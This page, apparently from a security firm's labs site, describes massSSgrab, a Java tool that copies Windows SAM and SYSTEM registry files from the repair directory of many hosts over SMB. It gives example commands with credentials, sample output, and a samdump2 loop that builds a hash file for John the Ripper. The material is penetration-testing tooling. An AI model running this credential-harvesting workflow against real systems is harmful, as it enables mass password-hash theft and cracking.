Research and Development

This tool will use included JCIFS library to grab copies of both system and SAM files from “C:\windows\repair\” directory from multiple hosts.

Key features

A large scale SAM and system grabber from /repair/. It might be useful for these corner cases where live capture of SAM and system files is not possible but you would like to get historic hashes out of the system.

Installation

No installation needed, just download and run.

Usage and example

$ java -jar massSSgrab.jar --h=/tmp/ips.txt --u=Administrator --p=Password1 --d=WORKSTATION --o=/tmp/SS --verbose --sam=sam --system=system
 [+] Verbose mode ON
         [+]Will grab SAM/System from : 192.168.56.101
         [+]Running mass SAM/System grab agains : 192.168.56.101
                 [+] 192.168.56.101 :
                         [+] SAM file exists
                         [+] System file exists
                         [+] SAM file saved in /tmp/SS/192.168.56.101/SAM_dump
                         [+] System file saved in /tmp/SS/192.168.56.101/System_dump

In the end of the run you will have a directory full of IP’s and in each of them you would get two files – sam and system. In order to extract the hashes from them you can simply use the following command to turn all the files into single ‘crackable’ hash file and use it for ‘john’ input (provided that you use samdump2 for it):

$ for ip in $(ls /tmp/SS/); do cd /tmp/SS/$ip && samdump2 SAM_dump System_dump; done > /tmp/hashes_from_repair

Options

--help - Display this help
--verbose - Be verbose
--h - Host List (IP's in text file)
--u - Username
--p - Password
--d - Domain
--o - Output Directory
--sam - name of the SAM file (default sam)
--system - name of the SYSTEM file (default system)

Request to be added to the Portcullis Labs newsletter

We will email you whenever a new tool, or post is added to the site.

Your Name (required)

Your Email (required)